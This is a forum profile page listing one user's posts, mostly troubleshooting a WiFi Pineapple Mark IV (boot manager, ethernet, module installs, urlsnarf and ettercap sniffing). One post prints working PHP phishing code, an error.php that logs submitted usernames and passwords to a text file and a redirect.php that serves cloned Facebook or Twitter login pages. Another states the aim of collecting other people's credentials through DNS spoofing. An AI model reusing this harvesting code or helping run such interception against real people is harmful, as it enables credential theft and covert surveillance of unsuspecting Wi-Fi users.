Jump to content

kdmcshane

Active Members
  • Posts

    34
  • Joined

  • Last visited

Everything posted by kdmcshane

  1. Does anyone know what copy of Ubuntu I could torrent that would have boot-repair on it if I burned the download onto a CD?
  2. Thanks, Stz! I really appreciate the reply. ^_^
  3. I had Windows 7 & Backtrack installed and when I would turn my laptop on, it would have a dual boot ubuntu manager where I would select booting into Windows 7 or Backtrack. I deleted Windows 7 and reinstalled that operating system. I'm guessing that during the Windows 7 installation it "repaired" the "bootmgr." So now it just boots into Windows 7 without asking me if I want to boot into Backtrack. The parition for Backtrack is still intacted. I just have no way of booting into it now. Is there any possible way to fix the bootmgr back to the way it was without having to reinstall Backtrack?
  4. Also, how many volts does the power supply push out? I might be able to just go through my box of random power cords and see if I have something that will fit into the device but I want to make sure I'm using a power supply that's compatible.
  5. I searched the web all over and can't find any way to order a replacement power adapter for my Mark IV
  6. When I diagnose the "Local Area Connection" it says, "An Ethernet Cable is not properly plugged in or might be broken." Which makes no sense because the ethernet cord I'm using is completely intact.
  7. I don't know what happened. It was working perfectly fine this morning. Suddenly when I plug in my ethernet cord I received with the pineappe device when I purchased it, Windows 7 is reporting "Network Cable Unplugged." Some people say it may have had something to do with the pineapple not getting enough power but I don't see how that was possible considering it was plugged into a wall jack. I also uninstalled my ethernet driver on Windows 7 and reinstalled it and that didn't help either. The pineapple itself seems to be working perfectly fine when I connect to it via wifi. But it just will not connect via ethernet. Any ideas on how to solve this problem would really really be appreciated.
  8. I also noticed that some saved web pages work and some do. For example. A copy of gmail worked but it wouldn't load a copy of amazon.htm for some reason. My only guess is that the htm files are too large to be loaded?
  9. I attempted to follow these instructions exactly when saving other webpages such as "amazon" (sign in page) and I searched for the correct places to change by searching "tabindex" in Notepad++ For some reason, the pineapple would load my facebook.htm but not the amazon.htm? Are there certain sites you can't copy and load up in DNS spoofing or is it because the amazon.htm and files that come with it are too large?
  10. No. I didn't realize that right away but I fixed everything and I have everything working now. But there is one thing I want to do that I don't know how to do. Instead of the error.php file just sending someone to the white page saying 503 gateway error, how do I just have it redirect them to the real website?
  11. So I think I figured it out. For some reason by renaming my html files to "htm" instead, they were successful. I don't really understand why the pineapple wouldn't be able to pull up the html files too.
  12. Alright. Well, I guess I'll just keep troubleshooting this problem until someone offers to step in a throw a few helpful words to me.
  13. At one point, I was able to get something to load when I typed in facebook.com, but that actually just went to a page listing all the files I had in my www folder on the pineapple. I don't want to do this because I want to collect other people's usernames and passwords. Even if I got them, you couldn't use them because their account wouldn't recognize your device but I simply enjoy the fascination of seeing these things in work. I've tried a lot of other stuff on the pineapple but this is my first attempt trying to do DNS spoofing and or pineapple phishing purely for recreational curiosity and nothing malicious. I've been working on trying to get this working for 10 hours straight and right when I think I am going to get it to work, it doesn't work. I'm going to continue to try to work on getting this to work tomorrow but if anyone is generous enough and are able enough to look past my noob appearance, I would greatly appreciate any help you can give me over teamviewer.
  14. Here's a snapshot of my php files. error.php <?php $ref = $_SERVER['HTTP_REFERER']; $today = date("F j, Y, g:i a"); if (isset($_POST['name']) && !empty($_POST['name'])) { $nam = stripslashes($_POST['name']); $pas = stripslashes($_POST['pass']); $nam = htmlspecialchars($nam, ENT_QUOTES); $pas = htmlspecialchars($pas, ENT_QUOTES); $content = $today . " -- " . $ref . " -- " . $nam . " -- " . $pas; $filed = @fopen("bitches.txt", "a+"); @fwrite($filed, "$content\n"); @fclose($filed); } ?> <html><body> <h1>503 Service Unavailable</h1> </body></html> -------------------------------------------------------------------------------------------------------------------------------------- index.php <html> <head> <meta http-equiv="REFRESH" content="0;url=redirect.php"> </head> <body> </body> </html> ---------------------------------------------------------------------------------------------------------------------------------------- redirect.php <?php $ref = $_SERVER['HTTP_REFERER']; if (strpos($ref, "facebook")) { header('Location: facebook.html'); } if (strpos($ref, "twitter")) { header('Location: twitter.html'); } require('peets.html'); ?> -------------------------------------------------------------------------------------------------------------------------------
  15. I can't even express how many tutorials I've tried following to get this to work and its still not working. This is the most recent tutorial I tried doing. http://hak5.org/hack/pineapple-phishing I followed every little instruction on this tutorial and it still doesn't work. If someone that is pretty savy and could set this up easy within a short period of time could jump on teamviewer and take a look at what I did wrong and why its not working, I'd really appreciate that.
  16. I think I figured out what was going on when I was trying to do commands for my pineapple in the terminal. It won't show anything if I do anything on the network, only when foregin devices connect and do things.
  17. I tried "urlsnarf -i lo" in the terminal and that didn't work either.
  18. I'm having so many difficulties with the modules that you can install into the pineapple. They simply won't work the way they should and I don't know how to view the log files it saves onto the USB hooked into the pineapple. Wouldn't it be easier to just use commands on the eth0 itself rather than hassling with the modules? There is only one problem with that. When I go to do simple commands such as "urlsnarf -i eth0" it doesn't show any live browsing even when I am browsing websites on the pineapple's internet. I just don't get it. I know I might be asking for a bit much from the community here but I would really appreciate if someone could tell me how to either get these modules working or better yet, tell me why ettercap commands and urlsnarf commands (commands like that) are not working on the eth0 connection when clearly there are people using my pineapple device. Otherwise I wasted $100 on this pineapple device if I can't get it to show me live website browsing and do MITM properly. This shouldn't be this hard. It feels like sometimes the pineapple wants to work and sometimes it just won't work randomly. I don't know if I bought a bad pineapple or I'm just not tech savy enough.
  19. Yes. I'll post that tonight.
  20. I followed the instructions perfectly and MITM module still doesn't install.
  21. Hmm. Alright then. Someone told me that all I had to do was format my 8GB USB to Ex4 and all the modules would work fine. Guess its not that simple for the MITM module. I tried using the Ettercap module to do MITM on the pineapple, but I wasn't really seeing that it was working at all. Also, another thing, the module used to DNS spoof someone to the Rick Rolling or Nyan Cat, even when I disabled the module, it would still redirect people to those pages. I ended up having to completely uninstall it, and reboot the pineapple for it to go away.
  22. Seems like a lot of work just to allow it to install. The other modules are simpler to install. Shouldn't the designers be working on a way to make this module easier to install?
  23. Despite my USB being properly formatted to Ex4 and all my other modules being installed are installing properly. MITM module absolutely does not want to install for some reason. I'll click install, and I'll sit there and wait and wait and wait only to find out that my pineapple rebooted, and I have to load it back up to access it through the browser and I check the MITM module and its not installed. (I am using an 8GB USB. There should be enough room for this to install)
  24. For the most part, formatting my USB into Ex4 solved most of my problems with installing modules onto the pineapple. The only module I'm having a tough time with still is the MITM module which is the module. It will not install. See this second thread I started for details. http://forums.hak5.org/index.php?/topic/29840-mitm-module-for-the-mark-iv-pineapple-does-not-install/
  25. Despite my USB being properly formatted to Ex4 and all my other modules being installed are installing properly. MITM module absolutely does not want to install for some reason. I'll click install, and I'll sit there and wait and wait and wait only to find out that my pineapple rebooted, and I have to load it back up to access it through the browser and I check the MITM module and its not installed. Are the creators of this module aware of this? Or is there a simpler way to perform MITM attack with the pineapple? Thanks to anyone who can help.
×
×
  • Create New...